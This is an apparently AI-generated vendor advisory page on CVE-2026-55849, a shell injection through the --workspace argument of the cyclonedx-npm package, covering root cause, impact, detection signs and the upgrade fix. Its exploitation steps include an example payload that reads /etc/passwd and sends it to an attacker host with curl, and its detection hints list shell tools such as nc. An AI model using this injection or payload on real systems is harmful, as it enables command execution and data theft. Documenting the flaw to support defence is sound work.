
PEACH
Un cadre d’isolation des locataires
CVE-2026-55849 is a shell/command injection vulnerability in the @cyclonedx/cyclonedx-npm npm package, titled "Shell Injection via Unsanitized --workspace Argument." It affects versions >= 2.1.0 and < 5.0.0 of the package. The vulnerability was discovered by researcher fortress07, coordinated by maintainer jkowalleck, and published to the GitHub Advisory Database on June 19, 2026. It carries a CVSS v4.0 base score of 8.5 (High) (GitHub Advisory, CycloneDX Advisory).
The root cause (CWE-78: OS Command Injection) lies in how cyclonedx-npm handles the --workspace CLI argument in its fallback execution path. When the environment variable npm_execpath is set, the tool invokes npm directly and no injection occurs. However, when npm_execpath is unset or empty, the tool falls back to spawning a subshell and interpolates the user-supplied --workspace value directly into the shell command string without escaping or sanitization. Shell metacharacters such as ;, &&, and | are therefore interpreted by the shell, allowing an attacker who controls the --workspace value to break out of the intended command context and execute arbitrary OS commands. The fix in PR #1476 replaced the unsafe execSync('npm ' + ...) shell invocation with execFileSync, resolving the npm executable path explicitly and eliminating the subshell fallback (GitHub Advisory, Fix PR #1476).
Successful exploitation allows an attacker to execute arbitrary OS commands with the privileges of the user running the cyclonedx-npm CLI. Potential consequences include arbitrary command execution, data exfiltration, modification or destruction of files accessible to the invoking user, and local privilege escalation depending on the deployment context. The impact is scoped to the vulnerable system; subsequent/downstream systems are not directly affected per the CVSS assessment (GitHub Advisory, CycloneDX Advisory).
@cyclonedx/cyclonedx-npm version >= 2.1.0 and < 5.0.0, and that the npm_execpath environment variable is unset or empty in the execution context.--workspace argument: Position the attacker-controlled value as the --workspace argument — this could occur via a malicious npm workspace name in a package.json, a CI/CD pipeline configuration that passes user-controlled input, or social engineering.my-workspace; <malicious-command> or my-workspace && curl http://attacker.com/exfil?data=$(cat /etc/passwd).cyclonedx-npm CLI to be invoked with the crafted --workspace value (e.g., cyclonedx-npm --workspace "my-workspace; <malicious-command>").cyclonedx-npm Node.js process (e.g., sh, bash, curl, wget, python, nc) that are not consistent with normal SBOM generation activity.cyclonedx-npm invocations; presence of shell metacharacters (;, &&, |) in process argument lists associated with cyclonedx-npm.cyclonedx-npm, particularly to external IPs or domains not associated with npm registries.cyclonedx-npm, especially scripts, cron jobs, or SSH authorized_keys modifications made around the time of tool invocation.The primary remediation is to upgrade @cyclonedx/cyclonedx-npm to version 5.0.0 or later, which eliminates the vulnerable subshell fallback by resolving the npm executable path explicitly and using execFileSync (v5.0.0 Release, Fix PR #1476). As a temporary workaround for environments that cannot immediately upgrade, ensure the npm_execpath environment variable is set before invoking the tool, which prevents the vulnerable fallback code path from being triggered. Additionally, avoid passing untrusted or user-controlled values to the --workspace option (GitHub Advisory).
The vulnerability was reported by security researcher fortress07 and coordinated by CycloneDX maintainer jkowalleck, who led the fix effort. The fix required cross-platform consideration, as an initial proposed fix from the reporter broke the tool on Windows, prompting a more robust solution using explicit npm executable resolution. The v5.0.0 release was tagged as a breaking change due to the reworked npm handling behavior (Fix PR #1476, v5.0.0 Release). No broader media coverage or significant social media discussion has been identified at this time.
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."